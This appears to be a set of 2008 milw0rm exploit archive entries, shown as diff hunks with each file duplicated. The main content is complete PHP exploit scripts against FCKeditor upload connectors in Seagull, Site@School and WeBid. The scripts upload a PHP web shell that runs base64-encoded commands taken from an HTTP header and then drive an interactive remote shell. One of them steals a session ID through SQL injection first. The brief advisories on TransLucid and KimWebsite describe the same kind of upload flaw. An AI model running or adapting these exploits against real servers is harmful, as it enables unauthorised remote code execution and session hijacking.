details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
33. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
34. $Config['Enabled'] = true ;
35.
36. // Path to user files relative to the document root.
37. $Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
38.
39. // Fill the following value it you prefer to specify the absolute path for the
40. // user files directory. Usefull if you are using a virtual directory, symbolic
41. // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
42. // Attention: The above 'UserFilesPath' must point to the same directory.
43. $Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
44.
45. $Config['AllowedExtensions']['File'] = array() ;
46. $Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
47.
48. $Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
49. $Config['DeniedExtensions']['Image'] = array() ;
50.
51. $Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
52. $Config['DeniedExtensions']['Flash'] = array() ;
53.
54. $Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
55. $Config['DeniedExtensions']['Media'] = array() ;
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /seagull/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$filename = md5(time()).".php.php4";
$connector = "tinyfck/filemanager/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
while(1)
{
print "\nseagull-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-26]
<?php
/*
------------------------------------------------------------------------
Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://seagullproject.org/
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
33. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
34. $Config['Enabled'] = true ;
35.
36. // Path to user files relative to the document root.
37. $Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
38.
39. // Fill the following value it you prefer to specify the absolute path for the
40. // user files directory. Usefull if you are using a virtual directory, symbolic
41. // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
42. // Attention: The above 'UserFilesPath' must point to the same directory.
43. $Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
44.
45. $Config['AllowedExtensions']['File'] = array() ;
46. $Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
47.
48. $Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
49. $Config['DeniedExtensions']['Image'] = array() ;
50.
51. $Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
52. $Config['DeniedExtensions']['Flash'] = array() ;
53.
54. $Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
55. $Config['DeniedExtensions']['Media'] = array() ;
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /seagull/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$filename = md5(time()).".php.php4";
$connector = "tinyfck/filemanager/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
while(1)
{
print "\nseagull-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-26]


@ -1,194 +1,194 @@
<?php
/*
-------------------------------------------------------------------------
Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
-------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://siteatschool.sourceforge.net/
details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
63. $query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
64. if ($result = mysql_query($query))
65. {
66. $check_sessioncode = mysql_result($result, 0);
67. unset ($query);
68. unset ($result);
69. }
70. if ($_SESSION['sessioncode'] != $check_sessioncode)
71. {
72. //if we don't have a session present the login screen
73. Header("Location: ../../../../../index.php");
74. exit;
75. }
[...]
117. if ($option == "upload")
118. {
119. if (IsSet ($_FILES["new_file"]["name"]))
120. {
121. $file_name = $_FILES["new_file"]["name"];
122. }
123. if (IsSet ($_SESSION['opendir']))
124. {
125. $write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
126. // moveupload the file to $write_path, function is in core/common.inc.php
127. $temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.
128. sas_move_uploaded_file($write_path, $file_name, $temp_file);
129. }
130. $opendir = $_SESSION['opendir']; //for returning to the directory were we came from
131. }
an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
*/
error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path, $sid;
$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
$packet = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with {$ext} extension...";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
function get_sid()
{
global $host, $path, $prefix;
// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
$sql = "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$pieces = explode(chr(0xFF), http_send($host, $packet));
return $pieces[1];
}
function check_target()
{
global $host, $path, $prefix;
print "\n[-] Checking {$host}...";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
$prefix = $match[1];
}
print "\n+-----------------------------------------------------------------------+";
print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
print "\n+-----------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path \n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to sas directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = get_sid();
if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
else print "\n[-] Hijacking with sid {$sid}\n";
if (!($ext = upload())) die("\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
while(1)
{
print "\nsas-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-07-04]
<?php
/*
-------------------------------------------------------------------------
Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
-------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://siteatschool.sourceforge.net/
details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
63. $query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
64. if ($result = mysql_query($query))
65. {
66. $check_sessioncode = mysql_result($result, 0);
67. unset ($query);
68. unset ($result);
69. }
70. if ($_SESSION['sessioncode'] != $check_sessioncode)
71. {
72. //if we don't have a session present the login screen
73. Header("Location: ../../../../../index.php");
74. exit;
75. }
[...]
117. if ($option == "upload")
118. {
119. if (IsSet ($_FILES["new_file"]["name"]))
120. {
121. $file_name = $_FILES["new_file"]["name"];
122. }
123. if (IsSet ($_SESSION['opendir']))
124. {
125. $write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
126. // moveupload the file to $write_path, function is in core/common.inc.php
127. $temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.
128. sas_move_uploaded_file($write_path, $file_name, $temp_file);
129. }
130. $opendir = $_SESSION['opendir']; //for returning to the directory were we came from
131. }
an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
*/
error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path, $sid;
$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
$packet = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with {$ext} extension...";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
function get_sid()
{
global $host, $path, $prefix;
// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
$sql = "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$pieces = explode(chr(0xFF), http_send($host, $packet));
return $pieces[1];
}
function check_target()
{
global $host, $path, $prefix;
print "\n[-] Checking {$host}...";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
$prefix = $match[1];
}
print "\n+-----------------------------------------------------------------------+";
print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
print "\n+-----------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path \n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to sas directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = get_sid();
if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
else print "\n[-] Hijacking with sid {$sid}\n";
if (!($ext = upload())) die("\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
while(1)
{
print "\nsas-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-07-04]


@ -1,110 +1,110 @@
<?php
/*
-----------------------------------------------------------------
WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: Stack
[-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-09-01]
<?php
/*
-----------------------------------------------------------------
WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: Stack
[-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-09-01]


@ -1,53 +1,53 @@
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
# Vendor: www.translucidonline.com
# Vulnerable Version: 1.75 (prior versions also may be affected)
# Exploitation: Remote with browser
# Exploit: Available
# Impact: Medium
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_51.htm
###################################################################################
####################
- Description:
####################
transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
growing list of ready-made, professional layouts.
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
####################
- Exploit:
####################
http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-09-03]
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
# Vendor: www.translucidonline.com
# Vulnerable Version: 1.75 (prior versions also may be affected)
# Exploitation: Remote with browser
# Exploit: Available
# Impact: Medium
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_51.htm
###################################################################################
####################
- Description:
####################
transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
growing list of ready-made, professional layouts.
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
####################
- Exploit:
####################
http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-09-03]


@ -1,46 +1,46 @@
########################################################################
#
# S4rK3VT Hacking TEAM
#
# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
# discover by : Ciph3r
# We Are : Ciph3r & Rake
# Ciph3r_blackhat@yahoo.com
# Impact: Medium
# Fix: N/A
# Expl0ters Security TEAM ==>> www.Expl0iters.ir
########################################################################
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
[path]/fck/editor/filemanager/upload/php/upload.php script.
####################
- Exploit:
####################
http://example.com/[path]/fck/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
Iranian Hacker & Kurdish Security TEAM & My Mother
####################
# milw0rm.com [2008-09-09]
########################################################################
#
# S4rK3VT Hacking TEAM
#
# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
# discover by : Ciph3r
# We Are : Ciph3r & Rake
# Ciph3r_blackhat@yahoo.com
# Impact: Medium
# Fix: N/A
# Expl0ters Security TEAM ==>> www.Expl0iters.ir
########################################################################
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
[path]/fck/editor/filemanager/upload/php/upload.php script.
####################
- Exploit:
####################
http://example.com/[path]/fck/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
Iranian Hacker & Kurdish Security TEAM & My Mother
####################
# milw0rm.com [2008-09-09]


